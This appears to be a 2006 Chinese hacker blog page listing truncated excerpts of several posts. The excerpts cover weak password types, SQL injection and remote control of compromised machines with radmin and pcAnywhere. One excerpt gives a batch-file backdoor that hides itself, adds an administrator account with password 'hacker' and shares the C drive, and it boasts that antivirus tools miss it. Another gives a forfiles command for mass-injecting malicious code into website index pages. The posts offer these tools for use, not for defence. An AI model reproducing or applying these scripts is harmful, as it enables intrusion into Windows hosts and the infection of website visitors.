通常不很安全的密码主要有以下几种:
　　第一类:使用用户名/帐号作为密码。 

　　虽然这种密码很方便记忆，可是其安全几乎为0。因为几乎所有以破解密码为手段的黑客软件，都首先会将用户名作为破解密码的突破口，而破解这种密码的速度极快，这就等于为黑客的入侵提供了敞开着的大门。 

　　第二类:使用用户名/帐号..

代码思路是影子鹰DESERT朋友的，原代码比较麻烦，我做了改进，这个后门优点就是小而且不会被杀，放到SYSTEM32目录下就可以了 ，代码如下： 
  @echo off 
  @attrib +s + r xyt.bat
  @net user xyt hacker /add 
  @net localgroup administrators xyt /add 
  @net share c$=c: 
  @..

　风靡全球的SQL注入攻击，相信给很多人留下了深刻的印象，但是在这场攻击过后，笔者查阅了网上目前修补SQL注入的方法，发现里面都是一些“杂乱无章”的修补代码，对于不会编程


　　小知识:SQL注入是从正常的WWW端口访问，而且表面看起来跟一般的Web页面访问没什么区别，所以目前市面的防火墙都不会对SQL注入..

[ 2006-7-29 5:04:00 | By: HacKerTv
 ]

 
1.radmin连接法 

  条件是你权限够大，对方连_blank">防火墙也没有。封装个radmin上去，运行，开对方端口，然后radmin上去。本人从来米成功过。，端口到是给对方打开了。 

2.paanywhere 

  C:\\Documents and Settings\\All Users\\Application Data\\Syman..

用批处理对网站首页批量写入挂马代码


 
以前在网上发现了一个批量对网站首页加入挂马代马的软件,就有想法用批处理实现此功能
今天学了点批处理,刚好就想出来了,不是很完善,还是那句话...以后在改 
利用forfiles这个命令可以简单实现
例如:
forfiles /p d:\ /m index.asp /s /c "cmd.exe /c if @isdir==FALSE..